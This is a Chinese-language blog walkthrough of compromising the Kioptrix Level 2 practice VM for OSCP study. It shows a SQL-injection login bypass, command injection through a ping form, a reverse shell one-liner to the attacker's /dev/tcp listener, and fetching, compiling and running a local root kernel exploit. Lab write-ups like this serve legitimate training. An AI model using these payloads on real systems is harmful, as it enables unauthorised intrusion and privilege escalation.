当前位置: 首页 > news >正文

OSCP备战-kioptrix level _2详细分析

为什么审核一直不通过啊,这是靶机练习啊,为什么为什么为什么

探测目标IP

arp-scan -l


得出目标IP:192.168.155.164
也可以使用

netdiscover -i eth0 -r 192.168.155.0/24

端口扫描

nmap -sV -sT --min-rate 1000 -p1-65535 IP


结果如下:

└─$ nmap -sV -sT --min-rate 1000  -p1-65535 192.168.155.164
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-06 20:55 EDT
Nmap scan report for 192.168.155.164
Host is up (0.0034s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind  2 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
738/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)


80端口

访问一下,开局一个登录框


拿dirsearch 扫一下看看

dirsearch -u http://192.168.155.164 -e *


访问http://192.168.155.164/manual/index.html
apache页面,好像用处不大
回到登录框
端口开启有3306数据库
尝试SQL:
 

admin' or 1=1 #


进入后台,好像又空白了,但是网站嘛,查看源码一下


发现被注释掉的一部分源码
要恢复页面,bp抓返回包,去掉引号再放开,发现页面恢复正常了


网站执行Ping命令,很容易想到代码执行漏洞
试试看:

192.168.155.142;ls


回显显示出结果:index.php、pingit.php

kali开启监听:

nc -lvvp 9001


反弹shell:

192.168.155.142;sh -i >& /dev/tcp/192.168.155.142/9001 0>&1


查看kali,有结果了


查看id,显示:

uid=48(apache) gid=48(apache) groups=48(apache)


普通用户需要提权
查看系统版本:

uname -a


显示:

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux


查看详细的发行版系统版本信息:

cat /etc/*-release


查找版本漏洞:
 

searchsploit linux 2.6 centos 4.5


下载:

searchsploit -m 9542.c 


查看要求:

vim 9542.c 


因为要求将Poc下载到靶机里,我们通过反弹的shell实现
上kali机去开启一下服务:

python -m http.server 80


回到连接靶机,下载脚本:

cd /tmp
wget http://192.168.155.142/9542.c
ls


编译文件:

gcc 9542.c -o exploit
./exploit
whoami


权限是root了,大功告成

 

相关文章:

  • git的常用命令详解
  • Hex文件格式解析
  • numpy pandas
  • 【渗透测试】反序列化漏洞的原理、利用方式与防范措施
  • RabbitMQ学习(第二天)
  • [机器学习介绍与定义]机器学习-part1
  • [数据库之十三] 数据库索引之散列索引
  • 量子通信技术及其在信息安全中的应用:开启无条件安全通信的新时代
  • 视频添加字幕脚本分享
  • 【计算机网络 第8版】谢希仁编著 第四章网络层 题型总结2
  • Kubernetes 手动部署 Prometheus 学习计划
  • 笔记本电脑实现网线内网 + Wi-Fi外网同时使用的配置方案
  • 基于FPGA控制PCF8591开展ADC采样,以采样烟雾模块输出模拟电压为例(IIC通信)
  • 宴会综合生产实训室融合数字化宴会管理路径
  • flow-matching 之学习matcha-tts cosyvoice
  • 企业级UI测试的“双保险”:TestComplete的智能对象识别与详细报告功能
  • 本地聊天机器人部署方案
  • 安卓基础(静态方法)
  • 网络字节序 - 大端
  • Java的对象头:原理与源码详解
  • 2025年上海市模范集体、劳动模范和先进工作者名单揭晓
  • 梵蒂冈选出新教皇,外交部:望新教皇推动中梵关系不断改善
  • 暴雨及强对流天气黄色预警已发布!南方进入本轮降雨最强时段
  • 两部门发布外汇领域行刑反向衔接案例,织密金融安全“防护网”
  • 湖南张家界警方公告宣布一名外国人居留许可作废
  • 多个“网约摩托车”平台上线,工人日报:安全与监管不能掉队